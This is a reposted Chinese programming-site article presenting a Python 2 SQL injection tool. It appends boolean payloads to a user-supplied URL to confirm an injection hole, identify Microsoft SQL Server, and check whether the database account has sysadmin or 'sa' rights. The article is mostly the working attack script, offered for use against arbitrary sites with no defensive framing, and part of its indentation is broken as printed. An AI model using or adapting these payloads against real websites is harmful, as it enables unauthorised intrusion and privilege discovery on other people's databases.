当前位置:  编程技术>python

Python编写检测数据库SA用户的方法

    来源: 互联网  发布时间:2014-10-09

    本文导语:  本文讲述一个用Python写的小程序,用于有注入点的链接,以检测当前数据库用户是否为sa,详细代码如下: # Code by zhaoxiaobu Email: little.bu@hotmail.com #-*- coding: UTF-8 -*- from sys import exit from urllib import urlopen from string import jo...

本文讲述一个用Python写的小程序,用于有注入点的链接,以检测当前数据库用户是否为sa,详细代码如下:

# Code by zhaoxiaobu Email: little.bu@hotmail.com  
#-*- coding: UTF-8 -*-  
from sys import exit  
from urllib import urlopen  
from string import join,strip  
from re import search  
 
def is_sqlable(): 
  sql1="%20and%201=2" 
  sql2="%20and%201=1" 
  urlfile1=urlopen(url+sql1) 
  urlfile2=urlopen(url+sql2) 
  htmlcodes1=urlfile1.read() 
  htmlcodes2=urlfile2.read() 
  if not search(judge,htmlcodes1) and search(judge,htmlcodes2): 
  print "[信息]恭喜!这个URL是有注入漏洞的!n" 
  print "[信息]现在判断数据库是否是SQL Server,请耐心等候....."  
  is_SQLServer() 
  else: 
  print "[错误]你确定这个URL能用?换个别的试试吧!n"

def is_SQLServer(): 
  sql = "%20and%20exists%20(select%20*%20from%20sysobjects)" 
  urlfile=urlopen(url+sql) 
  htmlcodes=urlfile.read() 
  if not search(judge,htmlcodes): 
  print "[错误]数据库好像不是SQL Server的!n" 
  else: 
  print "[信息]确认是SQL Server数据库!n" 
  print "[信息]开始检测当前数据库用户权限,请耐心等待......" 
  is_sysadmin() 
 
 
def is_sysadmin():  
  sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" 
  urlfile = urlopen(url+sql)  
  htmlcodes = urlfile.read()  
  if not search(judge,htmlcodes):  
    print "[错误]当前数据库用户不具有sysadmin权限!n" 
  else:  
    print "[信息]当前数据库用户具有sysadmin权限!n" 
    print "[信息]检测当前用户是不是SA,请耐心等待......" 
    is_sa()  
 
def is_sa():  
  sql = "%20and%20'sa'=(select%20System_user)"; 
  urlfile = urlopen(url+sql)  
  htmlcodes = urlfile.read()  
  if not search(judge,htmlcodes):  
    print "[错误]当前数据库用户不是SA!n" 
  else:  
    print "[信息]当前数据库用户是SA!n" 
 
print "n########################################################################n"  
print "            ^o^SQL Server注入利用工具^o^     "  
print "           Email: little.bu@hotmail.comn"  
print "========================================================================";  
url = raw_input('[信息]请输入一个可能有注入漏洞的链接!nURL:')  
if url == '':  
  print "[错误]提供的URL必须具有 '.asp?xxx=' 这样的格式"  
  exit(1)  
 
judge = raw_input("[信息]请提供一个判断字符串.n判断字符串:")  
if judge == '':  
  print "[错误]判断字符串不能为空!"  
  exit(1)  
 
is_sqlable()

    
 
 

您可能感兴趣的文章:

  • 使用python编写批量卸载手机中安装的android应用脚本
  • python3编写C/S网络程序实例教程
  • vc6编写python扩展的方法分享
  • 使用python编写android截屏脚本双击运行即可
  • Python编写的com组件发生R6034错误的原因与解决办法
  • 使用python编写脚本获取手机当前应用apk的信息
  • Python实现Linux下守护进程的编写方法
  • Python语言编写电脑时间自动同步小工具
  • python编写网页爬虫脚本并实现APScheduler调度
  • 使用python检测手机QQ在线状态的脚本代码
  • python定时检查启动某个exe程序适合检测exe是否挂了
  • python检测lvs real server状态
  • phpsir 开发 一个检测百度关键字网站排名的python 程序
  • python检测服务器是否正常
  • python中使用OpenCV进行人脸检测的例子
  • 用Python和MD5实现网站挂马检测程序
  • python使用正则表达式检测密码强度源码分享
  • 测试、预发布后用python检测网页是否有日常链接
  • 2款Python内存检测工具介绍和使用方法
  • 一个检测OpenSSL心脏出血漏洞的Python脚本分享
  •  
    本站(WWW.)旨在分享和传播互联网科技相关的资讯和技术,将尽最大努力为读者提供更好的信息聚合和浏览方式。
    本站(WWW.)站内文章除注明原创外,均为转载、整理或搜集自网络。欢迎任何形式的转载,转载请注明出处。












  • 相关文章推荐
  • python mysqldb连接数据库
  • Python3实现连接SQLite数据库的方法
  • python备份文件以及mysql数据库的脚本代码
  • 技巧学习 在Python环境下连接Oracle数据库
  • python中常用的各种数据库操作模块和连接实例
  • python访问纯真IP数据库的代码
  • Python读写Redis数据库操作示例
  • python操作MySQL数据库具体方法
  • python操作MySQL数据库的方法分享
  • Python Mysql数据库操作 Perl操作Mysql数据库
  • python连接mongodb操作数据示例(mongodb数据库配置类)
  • python Django连接MySQL数据库做增删改查
  • Python 分析Nginx访问日志并保存到MySQL数据库实例
  • python使用mysqldb连接数据库操作方法示例详解
  • python连接mysql数据库示例(做增删改操作)
  • python操作数据库之sqlite3打开数据库、删除、修改示例
  • python操作MySQL数据库的方法分享 iis7站长之家
  • 使用python将mdb数据库文件导入postgresql数据库示例
  • python网络编程学习笔记(九):数据库客户端 DB-API
  • python连接MySQL、MongoDB、Redis、memcache等数据库的方法
  • Python GUI编程:tkinter实现一个窗口并居中代码
  • 让python同时兼容python2和python3的8个技巧分享
  • Python不使用print而直接输出二进制字符串
  • 使用setup.py安装python包和卸载python包的方法
  • Python中实现json字符串和dict类型的互转
  • 不小心把linux自带的python卸载了,导致安装一个依赖原python的软件不能安装,请问该怎么办?
  • python异常信息堆栈输出到日志文件
  • python读取csv文件示例(python操作csv)
  • python下用os.execl执行centos下的系统时间同步命令ntpdate
  • python基础教程之python消息摘要算法使用示例
  • Python namedtuple对象json序列化/反序列化及对象恢复


  • 站内导航:


    特别声明:169IT网站部分信息来自互联网,如果侵犯您的权利,请及时告知,本站将立即删除!

    ©2012-2021,,E-mail:www_#163.com(请将#改为@)

    浙ICP备11055608号-3